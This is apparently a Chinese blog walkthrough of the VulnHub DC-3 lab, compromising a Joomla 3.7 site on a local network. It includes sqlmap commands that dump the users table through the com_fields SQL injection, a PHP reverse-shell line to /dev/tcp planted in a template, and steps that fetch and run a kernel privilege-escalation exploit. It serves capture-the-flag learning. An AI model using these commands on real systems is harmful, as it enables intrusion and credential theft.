zoukankan      html  css  js  c++  java
  • VulnHub::DC-3

    实验环境

    DC-3_1

    本次只存在一个flag

    渗透过程

    0x01 信息搜集

    由于不知道靶机IP地址,进行D段扫描,获得靶机IP地址:

    masscan 192.168.1.0/24 --ping --rate 1000
    

    DC-3_2

    测试得知ip为192.168.1.14,进行端口扫描:

    sudo masscan 192.168.1.14 -p1-65535 --rate 1000
    
    Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-07-08 10:09:16 GMT
     -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
    Initiating SYN Stealth Scan
    Scanning 1 hosts [65535 ports/host]
    Discovered open port 110/tcp on 192.168.1.14                                 
    Discovered open port 80/tcp on 192.168.1.14                                 
    Discovered open port 25/tcp on 192.168.1.14       
    

    使用nmap进行详细扫描:

    DC-3_4

    直接访问web服务,是一个Joomla搭建的站。

    ➜ ~ whatweb http://192.168.1.14
    http://192.168.1.14 [200 OK] Apache[2.4.18], Bootstrap, Cookies[460ada11b31d3c5e5ca6e58fd5d3de27], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], HttpOnly[460ada11b31d3c5e5ca6e58fd5d3de27], IP[192.168.1.14], JQuery, MetaGenerator[Joomla! - Open Source Content Management], PasswordField[password], Script[application/json], Title[Home]  
    

    DC-3_3

    0x02 开打

    进行目录扫描:

    DC-3_5

    发现README.txt

    获得版本号:

    DC-3_6

    使用JoomScan工具进行验证,得到同样的结果:

    DC-3_7

    查找Joomla 3.7存在的漏洞:

    DC-3_8

    发现大部分都为sql注入漏洞,根据已有的payload进行测试。

    DC-3_9

    发现注入漏洞,使用sqlmap工具获取数据库信息。

    payload:python3 sqlmap.py -u "http://192.168.1.14/index.php?option=com_fields&view=fields&layout=modal&l
    ist[fullordering]=*" --risk=3 --level=5 --random-agent --dbs

    库名:

    DC-3_10

    列名:

    DC-3_11

    获得库中具体数据:

    python3 sqlmap.py -u "http://192.168.1.14/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C username,password --dump
    

    DC-3_12

    使用john工具进行爆破,得到密码:

    DC-3_13

    登录管理员后台,发现模板的位置可以修改页面源代码:

    DC-3_14

    index.php页面中加入反弹shell:

    DC-3_15

    <?php system("bash -c 'bash -i &> /dev/tcp/192.168.1.17/4444 0>&1'");?>
    

    成功反弹shell,查看当前用户:

    DC-3_16

    使用以下三条命令,可以尝试获取发行版的具体信息:

    cat /etc/issue
    cat /etc/redhat-release
    lsb_release -a
    

    DC-3_17

    搜索ubuntu 16.04出现过的漏洞,进行提权:

    DC-3_18

    挑一些进行尝试,最终39772成功:

    首先下载脚本,使用python搭建简单ftp服务器,将脚本下载到靶机上:

    python -m SimpleHTTPServer 9000		# python 2
    python3 -m http.server 80			# python 3
    

    依次运行以下命令:

    wget http://192.168.1.17:9000/exploit.tar
    tar xvf exploit.tar
    cd ebpf*
    bash compile.sh
    ./doubleput
    

    获得最终flag:

    DC-3_19

  • 相关阅读:
    A1066 Root of AVL Tree (25 分)
    A1099 Build A Binary Search Tree (30 分)
    A1043 Is It a Binary Search Tree (25 分) ——PA, 24/25, 先记录思路
    A1079; A1090; A1004:一般树遍历
    A1053 Path of Equal Weight (30 分)
    A1086 Tree Traversals Again (25 分)
    A1020 Tree Traversals (25 分)
    A1091 Acute Stroke (30 分)
    A1103 Integer Factorization (30 分)
    A1032 Sharing (25 分)
  • 原文地址:https://www.cnblogs.com/chalan630/p/13363670.html
Copyright © 2011-2022 走看看